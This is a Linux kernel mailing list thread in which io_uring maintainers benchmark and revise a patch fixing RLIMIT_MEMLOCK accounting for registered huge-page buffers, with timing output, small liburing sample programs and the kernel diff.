  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/23/26 7:50 AM, Jens Axboe wrote:
> On 1/23/26 7:26 AM, Pavel Begunkov wrote:
>> On 1/22/26 21:51, Pavel Begunkov wrote:
>> ...
>>>>>> I already briefly touched on that earlier, for sure not going to be of
>>>>>> any practical concern.
>>>>>
>>>>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>>>>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>>>>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>>>>> high spinlock contention, and it jumps again, and there can be more
>>>>> memory / CPUs / numa nodes. Not saying that it's worse than the
>>>>> current O(n^2), I have a test program that borderline hangs the
>>>>> system.
>>>>
>>>> It's definitely not worse than the existing system, which is why I don't
>>>> think it's a big deal. Nobody has ever complained about time to register
>>>> buffers. It's inherently a slow path, and quite slow at that depending
>>>> on the use case. Out of curiosity, I ran some silly testing on
>>>> registering 16GB of memory, with 1..32 threads. Each will do 16GB, so
>>>> 512GB registered in total for the 32 case. Before is the current kernel,
>>>> after is with per-user xarray accounting:
>>>>
>>>> before
>>>>
>>>> nthreads 1:      646 msec
>>>> nthreads 2:      888 msec
>>>> nthreads 4:      864 msec
>>>> nthreads 8:     1450 msec
>>>> nthreads 16:    2890 msec
>>>> nthreads 32:    4410 msec
>>>>
>>>> after
>>>>
>>>> nthreads 1:      650 msec
>>>> nthreads 2:      888 msec
>>>> nthreads 4:      892 msec
>>>> nthreads 8:     1270 msec
>>>> nthreads 16:    2430 msec
>>>> nthreads 32:    4160 msec
>>>>
>>>> This includes both registering buffers, cloning all of them to another
>>>> ring, and unregistering times, and nowhere is locking scalability an
>>>> issue for the xarray manipulation. The box has 32 nodes and 512 CPUs. So
>>>> no, I strongly believe this isn't an issue.
>>>>
>>>> IOW, accurate accounting is cheaper than the stuff we have now. None of
>>>> them are super cheap. Does it matter? I really don't think so, or people
>>>> would've complained already. The only complaint I got on these kinds of
>>>> things was for cloning, which did get fixed up some releases ago.
>>>
>>> You need compound pages
>>>
>>> always > /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
>>>
>>> And use update() instead of register() as accounting dedup for
>>> registration is broken-disabled. For the current kernel:
>>>
>>> Single threaded:
>>> 1x1G: 7.5s
>>> 2x1G: 45s
>>> 4x1G: 190s
>>>
>>> 16x should be ~3000s, not going to run it. Uninterruptible and no
>>> cond_resched, so spawn NR_CPUS threads and the system is completely
>>> unresponsive (I guess it depends on the preemption mode).
>> The program is below for reference, but it's trivial. THP setting
>> is done inside for convenience. There are ways to make the runtime
>> even worse, but that should be enough.
> 
> Thanks for sending that. Ran it on the same box, on current -git and
> with user_struct xarray accounting. Modified it so that 2nd arg is
> number of threads, for easy running:

Should've tried 32x32 as well, that ends up going deep into "this sucks"
territory:

git

good luck

git + user_struct

axboe@r7625 ~> time ./ppage 32 32
register 32 GB, num threads 32

________________________________________________________
Executed in   16.34 secs    fish           external
   usr time    0.54 secs  497.00 micros    0.54 secs
   sys time  451.94 secs   55.00 micros  451.94 secs

-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-23 15:04                           ` Jens Axboe
@ 2026-01-23 16:52                             ` Jens Axboe
  2026-01-24 11:04                               ` Pavel Begunkov
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-23 16:52 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/23/26 8:04 AM, Jens Axboe wrote:
> On 1/23/26 7:50 AM, Jens Axboe wrote:
>> On 1/23/26 7:26 AM, Pavel Begunkov wrote:
>>> On 1/22/26 21:51, Pavel Begunkov wrote:
>>> ...
>>>>>>> I already briefly touched on that earlier, for sure not going to be of
>>>>>>> any practical concern.
>>>>>>
>>>>>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>>>>>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>>>>>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>>>>>> high spinlock contention, and it jumps again, and there can be more
>>>>>> memory / CPUs / numa nodes. Not saying that it's worse than the
>>>>>> current O(n^2), I have a test program that borderline hangs the
>>>>>> system.
>>>>>
>>>>> It's definitely not worse than the existing system, which is why I don't
>>>>> think it's a big deal. Nobody has ever complained about time to register
>>>>> buffers. It's inherently a slow path, and quite slow at that depending
>>>>> on the use case. Out of curiosity, I ran some silly testing on
>>>>> registering 16GB of memory, with 1..32 threads. Each will do 16GB, so
>>>>> 512GB registered in total for the 32 case. Before is the current kernel,
>>>>> after is with per-user xarray accounting:
>>>>>
>>>>> before
>>>>>
>>>>> nthreads 1:      646 msec
>>>>> nthreads 2:      888 msec
>>>>> nthreads 4:      864 msec
>>>>> nthreads 8:     1450 msec
>>>>> nthreads 16:    2890 msec
>>>>> nthreads 32:    4410 msec
>>>>>
>>>>> after
>>>>>
>>>>> nthreads 1:      650 msec
>>>>> nthreads 2:      888 msec
>>>>> nthreads 4:      892 msec
>>>>> nthreads 8:     1270 msec
>>>>> nthreads 16:    2430 msec
>>>>> nthreads 32:    4160 msec
>>>>>
>>>>> This includes both registering buffers, cloning all of them to another
>>>>> ring, and unregistering times, and nowhere is locking scalability an
>>>>> issue for the xarray manipulation. The box has 32 nodes and 512 CPUs. So
>>>>> no, I strongly believe this isn't an issue.
>>>>>
>>>>> IOW, accurate accounting is cheaper than the stuff we have now. None of
>>>>> them are super cheap. Does it matter? I really don't think so, or people
>>>>> would've complained already. The only complaint I got on these kinds of
>>>>> things was for cloning, which did get fixed up some releases ago.
>>>>
>>>> You need compound pages
>>>>
>>>> always > /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
>>>>
>>>> And use update() instead of register() as accounting dedup for
>>>> registration is broken-disabled. For the current kernel:
>>>>
>>>> Single threaded:
>>>> 1x1G: 7.5s
>>>> 2x1G: 45s
>>>> 4x1G: 190s
>>>>
>>>> 16x should be ~3000s, not going to run it. Uninterruptible and no
>>>> cond_resched, so spawn NR_CPUS threads and the system is completely
>>>> unresponsive (I guess it depends on the preemption mode).
>>> The program is below for reference, but it's trivial. THP setting
>>> is done inside for convenience. There are ways to make the runtime
>>> even worse, but that should be enough.
>>
>> Thanks for sending that. Ran it on the same box, on current -git and
>> with user_struct xarray accounting. Modified it so that 2nd arg is
>> number of threads, for easy running:
> 
> Should've tried 32x32 as well, that ends up going deep into "this sucks"
> territory:
> 
> git
> 
> good luck
> 
> git + user_struct
> 
> axboe@r7625 ~> time ./ppage 32 32
> register 32 GB, num threads 32
> 
> ________________________________________________________
> Executed in   16.34 secs    fish           external
>    usr time    0.54 secs  497.00 micros    0.54 secs
>    sys time  451.94 secs   55.00 micros  451.94 secs

OK, here are the numbers if we use a per-ctx btree instead; otherwise the
code is the same:

axboe@r7625 ~> for i in 1 2 4 8 16; time ./ppage $i $i; end
register 1 GB, num threads 1

________________________________________________________
Executed in   54.06 millis    fish           external
   usr time   41.70 millis  382.00 micros   41.32 millis
   sys time   10.64 millis  314.00 micros   10.33 millis

register 2 GB, num threads 2

________________________________________________________
Executed in  105.56 millis    fish           external
   usr time   60.65 millis  485.00 micros   60.16 millis
   sys time   40.11 millis    0.00 micros   40.11 millis

register 4 GB, num threads 4

________________________________________________________
Executed in  209.98 millis    fish           external
   usr time   38.57 millis  447.00 micros   38.12 millis
   sys time  190.61 millis    0.00 micros  190.61 millis

register 8 GB, num threads 8

________________________________________________________
Executed in  423.37 millis    fish           external
   usr time  130.50 millis  470.00 micros  130.03 millis
   sys time  380.80 millis    0.00 micros  380.80 millis

register 16 GB, num threads 16

________________________________________________________
Executed in  832.71 millis    fish           external
   usr time    0.27 secs    470.00 micros    0.27 secs
   sys time    1.04 secs      0.00 micros    1.04 secs

and the crazier cases:

axboe@r7625 ~> time ./ppage 32 32
register 32 GB, num threads 32

________________________________________________________
Executed in    2.81 secs    fish           external
   usr time    0.71 secs  497.00 micros    0.71 secs
   sys time   19.57 secs  183.00 micros   19.57 secs

which isn't insane. Obviously also needs conditional rescheduling in the
page loops, as those can take a loooong time for large amounts of
memory.

-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-23 16:52                             ` Jens Axboe
@ 2026-01-24 11:04                               ` Pavel Begunkov
  2026-01-24 15:14                                 ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-24 11:04 UTC (permalink / raw)
  To: Jens Axboe, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/23/26 16:52, Jens Axboe wrote:
> On 1/23/26 8:04 AM, Jens Axboe wrote:
>> On 1/23/26 7:50 AM, Jens Axboe wrote:
>>> On 1/23/26 7:26 AM, Pavel Begunkov wrote:
>>>> On 1/22/26 21:51, Pavel Begunkov wrote:
>>>> ...
>>>>>>>> I already briefly touched on that earlier, for sure not going to be of
>>>>>>>> any practical concern.
>>>>>>>
>>>>>>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>>>>>>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>>>>>>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>>>>>>> high spinlock contention, and it jumps again, and there can be more
>>>>>>> memory / CPUs / numa nodes. Not saying that it's worse than the
>>>>>>> current O(n^2), I have a test program that borderline hangs the
>>>>>>> system.
...
>> Should've tried 32x32 as well, that ends up going deep into "this sucks"
>> territory:
>>
>> git
>>
>> good luck

FWIW, current scales perfectly with CPUs, so just 1 thread
should be enough for testing.

>> git + user_struct
>>
>> axboe@r7625 ~> time ./ppage 32 32
>> register 32 GB, num threads 32
>>
>> ________________________________________________________
>> Executed in   16.34 secs    fish           external

That's about as close to the calculations above as it could be; those
assumed 100x16GB, but that should only differ by a factor of ~1.5.
Without anchoring to this particular number, the problem is that
the wall clock runtime for the accounting will depend linearly on
the number of threads, so this 16 sec is what seemed concerning.

>>     usr time    0.54 secs  497.00 micros    0.54 secs
>>     sys time  451.94 secs   55.00 micros  451.94 secs
> 
...
> and the crazier cases:

I don't think it's even a crazy case, thinking of databases with
lots of cache memory they want to read into / write from. 100GB+
shouldn't be surprising.

> axboe@r7625 ~> time ./ppage 32 32
> register 32 GB, num threads 32
> 
> ________________________________________________________
> Executed in    2.81 secs    fish           external
>     usr time    0.71 secs  497.00 micros    0.71 secs
>     sys time   19.57 secs  183.00 micros   19.57 secs
> 
> which isn't insane. Obviously also needs conditional rescheduling in the
> page loops, as those can take a loooong time for large amounts of
> memory.

2.8 sec sounds like a lot as well, and makes me wonder which part of
that is mm, but the mm side should scale fine-ish. Surely there will be
contention on page refcounts, but at least the table walk is
lockless in the best case scenario and otherwise seems to be
read-protected by an rw lock.

-- 
Pavel Begunkov


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-24 11:04                               ` Pavel Begunkov
@ 2026-01-24 15:14                                 ` Jens Axboe
  2026-01-24 15:55                                   ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-24 15:14 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/24/26 4:04 AM, Pavel Begunkov wrote:
> On 1/23/26 16:52, Jens Axboe wrote:
>> On 1/23/26 8:04 AM, Jens Axboe wrote:
>>> On 1/23/26 7:50 AM, Jens Axboe wrote:
>>>> On 1/23/26 7:26 AM, Pavel Begunkov wrote:
>>>>> On 1/22/26 21:51, Pavel Begunkov wrote:
>>>>> ...
>>>>>>>>> I already briefly touched on that earlier, for sure not going to be of
>>>>>>>>> any practical concern.
>>>>>>>>
>>>>>>>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>>>>>>>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>>>>>>>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>>>>>>>> high spinlock contention, and it jumps again, and there can be more
>>>>>>>> memory / CPUs / numa nodes. Not saying that it's worse than the
>>>>>>>> current O(n^2), I have a test program that borderline hangs the
>>>>>>>> system.
> ...
>>> Should've tried 32x32 as well, that ends up going deep into "this sucks"
>>> territory:
>>>
>>> git
>>>
>>> good luck
> 
> FWIW, current scales perfectly with CPUs, so just 1 thread
> should be enough for testing.
> 
>>> git + user_struct
>>>
>>> axboe@r7625 ~> time ./ppage 32 32
>>> register 32 GB, num threads 32
>>>
>>> ________________________________________________________
>>> Executed in   16.34 secs    fish           external
> 
> That's about as close to the calculations above as it could be; those
> assumed 100x16GB, but that should only differ by a factor of ~1.5.
> Without anchoring to this particular number, the problem is that
> the wall clock runtime for the accounting will depend linearly on
> the number of threads, so this 16 sec is what seemed concerning.
> 
>>>     usr time    0.54 secs  497.00 micros    0.54 secs
>>>     sys time  451.94 secs   55.00 micros  451.94 secs
>>
> ...
>> and the crazier cases:
> 
> I don't think it's even a crazy case, thinking of databases with
> lots of cache memory they want to read into / write from. 100GB+
> shouldn't be surprising.

I mean crazier in terms of runtime, not use case. 32G is peanuts in
terms of memory these days.

>> axboe@r7625 ~> time ./ppage 32 32
>> register 32 GB, num threads 32
>>
>> ________________________________________________________
>> Executed in    2.81 secs    fish           external
>>     usr time    0.71 secs  497.00 micros    0.71 secs
>>     sys time   19.57 secs  183.00 micros   19.57 secs
>>
>> which isn't insane. Obviously also needs conditional rescheduling in the
>> page loops, as those can take a loooong time for large amounts of
>> memory.
> 
> 2.8 sec sounds like a lot as well, and makes me wonder which part of
> that is mm, but the mm side should scale fine-ish. Surely there will be
> contention on page refcounts, but at least the table walk is
> lockless in the best case scenario and otherwise seems to be
> read-protected by an rw lock.

Well a lot of that is also just faulting in the memory on clear, test
case should probably be modified to do its own timing. And iterating
page arrays is a huge part of it too. There's no real contention in that
2.8 seconds.
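
For reference, a minimal standalone sketch of that kind of split timing,
i.e. timing the fault-in and the registration separately. This is a
sketch only, not the threaded ppage/update test: it assumes liburing and
just uses plain io_uring_register_buffers() for illustration.

#include <liburing.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

static long long msecs_since(const struct timespec *start)
{
	struct timespec now;

	clock_gettime(CLOCK_MONOTONIC, &now);
	return (now.tv_sec - start->tv_sec) * 1000LL +
	       (now.tv_nsec - start->tv_nsec) / 1000000LL;
}

int main(int argc, char *argv[])
{
	unsigned long long gb = argc > 1 ? strtoull(argv[1], NULL, 0) : 1;
	size_t len = gb << 30;
	struct io_uring ring;
	struct timespec ts;
	struct iovec iov;
	void *buf;
	int ret;

	if (io_uring_queue_init(8, &ring, 0))
		return 1;
	if (posix_memalign(&buf, 4096, len))
		return 1;

	/* fault the memory in up front, timed on its own */
	clock_gettime(CLOCK_MONOTONIC, &ts);
	memset(buf, 0, len);
	printf("clear msec %lld\n", msecs_since(&ts));

	iov.iov_base = buf;
	iov.iov_len = len;

	/* time only the buffer registration itself */
	clock_gettime(CLOCK_MONOTONIC, &ts);
	ret = io_uring_register_buffers(&ring, &iov, 1);
	printf("register msec %lld (ret %d)\n", msecs_since(&ts), ret);

	io_uring_unregister_buffers(&ring);
	io_uring_queue_exit(&ring);
	free(buf);
	return 0;
}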

-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-24 15:14                                 ` Jens Axboe
@ 2026-01-24 15:55                                   ` Jens Axboe
  2026-01-24 16:30                                     ` Pavel Begunkov
  2026-01-24 18:44                                     ` Jens Axboe
  0 siblings, 2 replies; 22+ messages in thread
From: Jens Axboe @ 2026-01-24 15:55 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/24/26 8:14 AM, Jens Axboe wrote:
>>> ________________________________________________________
>>> Executed in    2.81 secs    fish           external
>>>     usr time    0.71 secs  497.00 micros    0.71 secs
>>>     sys time   19.57 secs  183.00 micros   19.57 secs
>>>
>>> which isn't insane. Obviously also needs conditional rescheduling in the
>>> page loops, as those can take a loooong time for large amounts of
>>> memory.
>>
>> 2.8 sec sounds like a lot as well, and makes me wonder which part of
>> that is mm, but the mm side should scale fine-ish. Surely there will be
>> contention on page refcounts, but at least the table walk is
>> lockless in the best case scenario and otherwise seems to be
>> read-protected by an rw lock.
> 
> Well a lot of that is also just faulting in the memory on clear, test
> case should probably be modified to do its own timing. And iterating
> page arrays is a huge part of it too. There's no real contention in that
> 2.8 seconds.

I checked and the faulting part is 2.0s of that runtime. On a re-run:

axboe@r7625 ~> time ./ppage 32 32
register 32 GB, num threads 32
clear msec 2011

________________________________________________________
Executed in    3.13 secs    fish           external
   usr time    0.78 secs  193.00 micros    0.78 secs
   sys time   27.46 secs  271.00 micros   27.46 secs

Or just a single thread:

axboe@r7625 ~> time ./ppage 32 1
register 32 GB, num threads 1
clear msec 2081

________________________________________________________
Executed in    2.29 secs    fish           external
   usr time    0.58 secs  750.00 micros    0.58 secs
   sys time    1.71 secs    0.00 micros    1.71 secs

axboe@r7625 ~ [1]> time ./ppage 64 1
register 64 GB, num threads 1
clear msec 5380

________________________________________________________
Executed in    6.24 secs    fish           external
   usr time    1.42 secs  328.00 micros    1.42 secs
   sys time    4.82 secs  375.00 micros    4.82 secs

-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-24 15:55                                   ` Jens Axboe
@ 2026-01-24 16:30                                     ` Pavel Begunkov
  2026-01-24 18:44                                     ` Jens Axboe
  1 sibling, 0 replies; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-24 16:30 UTC (permalink / raw)
  To: Jens Axboe, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/24/26 15:55, Jens Axboe wrote:
> On 1/24/26 8:14 AM, Jens Axboe wrote:
>>>> ________________________________________________________
>>>> Executed in    2.81 secs    fish           external
>>>>      usr time    0.71 secs  497.00 micros    0.71 secs
>>>>      sys time   19.57 secs  183.00 micros   19.57 secs
>>>>
>>>> which isn't insane. Obviously also needs conditional rescheduling in the
>>>> page loops, as those can take a loooong time for large amounts of
>>>> memory.
>>>
>>> 2.8 sec sounds like a lot as well, and makes me wonder which part of
>>> that is mm, but the mm side should scale fine-ish. Surely there will be
>>> contention on page refcounts, but at least the table walk is
>>> lockless in the best case scenario and otherwise seems to be
>>> read-protected by an rw lock.
>>
>> Well a lot of that is also just faulting in the memory on clear, test
>> case should probably be modified to do its own timing. And iterating
>> page arrays is a huge part of it too. There's no real contention in that
>> 2.8 seconds.
> 
> I checked and the faulting part is 2.0s of that runtime. On a re-run:

Makes sense, I was forgetting it's the full wall-clock time.

-- 
Pavel Begunkov


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-24 15:55                                   ` Jens Axboe
  2026-01-24 16:30                                     ` Pavel Begunkov
@ 2026-01-24 18:44                                     ` Jens Axboe
  1 sibling, 0 replies; 22+ messages in thread
From: Jens Axboe @ 2026-01-24 18:44 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/24/26 8:55 AM, Jens Axboe wrote:
> On 1/24/26 8:14 AM, Jens Axboe wrote:
>>>> ________________________________________________________
>>>> Executed in    2.81 secs    fish           external
>>>>     usr time    0.71 secs  497.00 micros    0.71 secs
>>>>     sys time   19.57 secs  183.00 micros   19.57 secs
>>>>
>>>> which isn't insane. Obviously also needs conditional rescheduling in the
>>>> page loops, as those can take a loooong time for large amounts of
>>>> memory.
>>>
>>> 2.8 sec sounds like a lot as well, and makes me wonder which part of
>>> that is mm, but the mm side should scale fine-ish. Surely there will be
>>> contention on page refcounts, but at least the table walk is
>>> lockless in the best case scenario and otherwise seems to be
>>> read-protected by an rw lock.
>>
>> Well a lot of that is also just faulting in the memory on clear, test
>> case should probably be modified to do its own timing. And iterating
>> page arrays is a huge part of it too. There's no real contention in that
>> 2.8 seconds.
> 
> I checked and the faulting part is 2.0s of that runtime. On a re-run:
> 
> axboe@r7625 ~> time ./ppage 32 32
> register 32 GB, num threads 32
> clear msec 2011
> 
> ________________________________________________________
> Executed in    3.13 secs    fish           external
>    usr time    0.78 secs  193.00 micros    0.78 secs
>    sys time   27.46 secs  271.00 micros   27.46 secs
> 
> Or just a single thread:
> 
> axboe@r7625 ~> time ./ppage 32 1
> register 32 GB, num threads 1
> clear msec 2081
> 
> ________________________________________________________
> Executed in    2.29 secs    fish           external
>    usr time    0.58 secs  750.00 micros    0.58 secs
>    sys time    1.71 secs    0.00 micros    1.71 secs
> 
> axboe@r7625 ~ [1]> time ./ppage 64 1
> register 64 GB, num threads 1
> clear msec 5380
> 
> ________________________________________________________
> Executed in    6.24 secs    fish           external
>    usr time    1.42 secs  328.00 micros    1.42 secs
>    sys time    4.82 secs  375.00 micros    4.82 secs

Pondering this some more... We only need the page as the key, as far as
I can tell. The memory is always accounted to ctx->user anyway, and a
struct page address is the same across mm's. So unless I'm missing
something, which is of course quite possible, per-ctx accounting should
be just fine. This will obviously account each ring's registrations
separately, but that's what we're doing now anyway. If we want per
user_struct accounting that only accounts each unique page once, then
we'd simply need to move the xarray to struct user_struct. At least to
me, the important part here is that we need to keep the page pinned
until all refs to it have dropped.

Running with multiple threads in this test case is also pretty futile,
as most of them will run into contention in:

io_register_rsrc_update
    __io_register_rsrc_update
        io_sqe_buffer_register
           io_pin_pages
               gup_fast_fallback
                   __gup_longterm_locked
                       __get_user_pages
                           handle_mm_fault
                           follow_page_pte

which is where basically all of the time is spent on the thread side
when there are multiple threads doing this at the same time. This is
really why cloning exists: just register the buffers once in the parent
and clone them between threads.
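
A rough sketch of that register-once-then-clone pattern, for reference.
This is illustrative only, not the test program: it assumes a kernel with
buffer cloning support and liburing 2.8+ for io_uring_clone_buffers().

#include <liburing.h>
#include <pthread.h>
#include <stdlib.h>
#include <string.h>

#define NR_THREADS	4
#define BUF_SIZE	(1UL << 30)

static struct io_uring parent_ring;

static void *worker(void *arg)
{
	struct io_uring ring;

	(void)arg;
	if (io_uring_queue_init(8, &ring, 0))
		return NULL;

	/* take a reference to the parent's registered buffers */
	if (io_uring_clone_buffers(&ring, &parent_ring)) {
		io_uring_queue_exit(&ring);
		return NULL;
	}

	/* ... issue READ_FIXED/WRITE_FIXED against the shared buffers ... */

	io_uring_queue_exit(&ring);
	return NULL;
}

int main(void)
{
	pthread_t threads[NR_THREADS];
	struct iovec iov;
	void *buf;
	int i;

	if (io_uring_queue_init(8, &parent_ring, 0))
		return 1;
	if (posix_memalign(&buf, 4096, BUF_SIZE))
		return 1;
	memset(buf, 0, BUF_SIZE);

	iov.iov_base = buf;
	iov.iov_len = BUF_SIZE;

	/* pin and account the memory once, in the parent ring */
	if (io_uring_register_buffers(&parent_ring, &iov, 1))
		return 1;

	for (i = 0; i < NR_THREADS; i++)
		pthread_create(&threads[i], NULL, worker, NULL);
	for (i = 0; i < NR_THREADS; i++)
		pthread_join(threads[i], NULL);

	io_uring_queue_exit(&parent_ring);
	free(buf);
	return 0;
}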

With all that said, here's the test patch I've run just now:

From 9d7186140889a5db525b425f82e4da642070e82d Mon Sep 17 00:00:00 2001
From: Jens Axboe <axboe@kernel.dk>
Date: Sat, 24 Jan 2026 10:02:41 -0700
Subject: [PATCH] io_uring/rsrc: add huge page accounting for registered
 buffers

Track huge page references in a per-ring xarray to prevent double
accounting when the same huge page is used by multiple registered
buffers, either within the same ring or across cloned rings.

When registering buffers backed by huge pages, we need to account for
RLIMIT_MEMLOCK. But if multiple buffers share the same huge page (common
with cloned buffers), we must not account for the same page multiple
times. Similarly, we must only unaccount when the last reference to a
huge page is released.

Maintain a per-ring xarray (hpage_acct) that tracks reference counts for
each huge page. When registering a buffer, for each unique huge page,
increment its accounting reference count, and only account pages that
are newly added.

When unregistering a buffer, for each unique huge page, decrement its
refcount. Once the refcount hits zero, the page is unaccounted.

Note: any accounting is done against the ctx->user that was assigned
when the ring was set up. As before, if root is running the operation,
no accounting is done.

With these changes, any use of imu->acct_pages is also dead, hence kill
it from struct io_mapped_ubuf. This shrinks it from 56b to 48b on a
64-bit arch.

Signed-off-by: Jens Axboe <axboe@kernel.dk>
---
 include/linux/io_uring_types.h |   3 +
 io_uring/io_uring.c            |   3 +
 io_uring/rsrc.c                | 218 ++++++++++++++++++++++++---------
 io_uring/rsrc.h                |   1 -
 4 files changed, 164 insertions(+), 61 deletions(-)

diff --git a/include/linux/io_uring_types.h b/include/linux/io_uring_types.h
index dc6bd6940a0d..69b9aaf5b3d2 100644
--- a/include/linux/io_uring_types.h
+++ b/include/linux/io_uring_types.h
@@ -418,6 +418,9 @@ struct io_ring_ctx {
 	/* Stores zcrx object pointers of type struct io_zcrx_ifq */
 	struct xarray			zcrx_ctxs;
 
+	/* Used for accounting references on pages in registered buffers */
+	struct xarray		hpage_acct;
+
 	u32			pers_next;
 	struct xarray		personalities;
 
diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index 5c503a3f6ecc..dde5d7709c4f 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
@@ -230,6 +230,7 @@ static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
 		return NULL;
 
 	xa_init(&ctx->io_bl_xa);
+	xa_init(&ctx->hpage_acct);
 
 	/*
 	 * Use 5 bits less than the max cq entries, that should give us around
@@ -298,6 +299,7 @@ static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
 	io_free_alloc_caches(ctx);
 	kvfree(ctx->cancel_table.hbs);
 	xa_destroy(&ctx->io_bl_xa);
+	xa_destroy(&ctx->hpage_acct);
 	kfree(ctx);
 	return NULL;
 }
@@ -2178,6 +2180,7 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
 	io_napi_free(ctx);
 	kvfree(ctx->cancel_table.hbs);
 	xa_destroy(&ctx->io_bl_xa);
+	xa_destroy(&ctx->hpage_acct);
 	kfree(ctx);
 }
 
diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
index 41c89f5c616d..cf22de299464 100644
--- a/io_uring/rsrc.c
+++ b/io_uring/rsrc.c
@@ -28,7 +28,45 @@ struct io_rsrc_update {
 };
 
 static struct io_rsrc_node *io_sqe_buffer_register(struct io_ring_ctx *ctx,
-			struct iovec *iov, struct page **last_hpage);
+						   struct iovec *iov);
+
+static bool hpage_acct_ref(struct io_ring_ctx *ctx, struct page *hpage)
+{
+	unsigned long key = (unsigned long) hpage;
+	unsigned long count;
+	void *entry;
+
+	lockdep_assert_held(&ctx->uring_lock);
+
+	entry = xa_load(&ctx->hpage_acct, key);
+	if (!entry && xa_reserve(&ctx->hpage_acct, key, GFP_KERNEL_ACCOUNT))
+		return false;
+
+	count = 1;
+	if (entry)
+		count = xa_to_value(entry) + 1;
+	xa_store(&ctx->hpage_acct, key, xa_mk_value(count), GFP_NOWAIT);
+	return count == 1;
+}
+
+static bool hpage_acct_unref(struct io_ring_ctx *ctx, struct page *hpage)
+{
+	unsigned long key = (unsigned long) hpage;
+	unsigned long count;
+	void *entry;
+
+	lockdep_assert_held(&ctx->uring_lock);
+
+	entry = xa_load(&ctx->hpage_acct, key);
+	if (WARN_ON_ONCE(!entry))
+		return false;
+	count = xa_to_value(entry);
+	if (count == 1)
+		xa_erase(&ctx->hpage_acct, key);
+	else
+		xa_store(&ctx->hpage_acct, key, xa_mk_value(count - 1), GFP_NOWAIT);
+	return count == 1;
+}
 
 /* only define max */
 #define IORING_MAX_FIXED_FILES	(1U << 20)
@@ -139,15 +177,53 @@ static void io_free_imu(struct io_ring_ctx *ctx, struct io_mapped_ubuf *imu)
 		kvfree(imu);
 }
 
+static unsigned long io_buffer_unaccount_pages(struct io_ring_ctx *ctx,
+					       struct io_mapped_ubuf *imu)
+{
+	struct page *seen = NULL;
+	unsigned long acct = 0;
+	int i;
+
+	if (imu->is_kbuf || !ctx->user)
+		return 0;
+
+	for (i = 0; i < imu->nr_bvecs; i++) {
+		struct page *page = imu->bvec[i].bv_page;
+		struct page *hpage;
+
+		if (!PageCompound(page)) {
+			acct++;
+			continue;
+		}
+
+		hpage = compound_head(page);
+		if (hpage == seen)
+			continue;
+		seen = hpage;
+
+		/* Unaccount on last reference */
+		if (hpage_acct_unref(ctx, hpage))
+			acct += page_size(hpage) >> PAGE_SHIFT;
+		cond_resched();
+	}
+
+	return acct;
+}
+
 static void io_buffer_unmap(struct io_ring_ctx *ctx, struct io_mapped_ubuf *imu)
 {
+	unsigned long acct_pages = 0;
+
+	/* Always decrement, so it works for cloned buffers too */
+	acct_pages = io_buffer_unaccount_pages(ctx, imu);
+
 	if (unlikely(refcount_read(&imu->refs) > 1)) {
 		if (!refcount_dec_and_test(&imu->refs))
 			return;
 	}
 
-	if (imu->acct_pages)
-		io_unaccount_mem(ctx->user, ctx->mm_account, imu->acct_pages);
+	if (acct_pages)
+		io_unaccount_mem(ctx->user, ctx->mm_account, acct_pages);
 	imu->release(imu->priv);
 	io_free_imu(ctx, imu);
 }
@@ -294,7 +370,6 @@ static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
 {
 	u64 __user *tags = u64_to_user_ptr(up->tags);
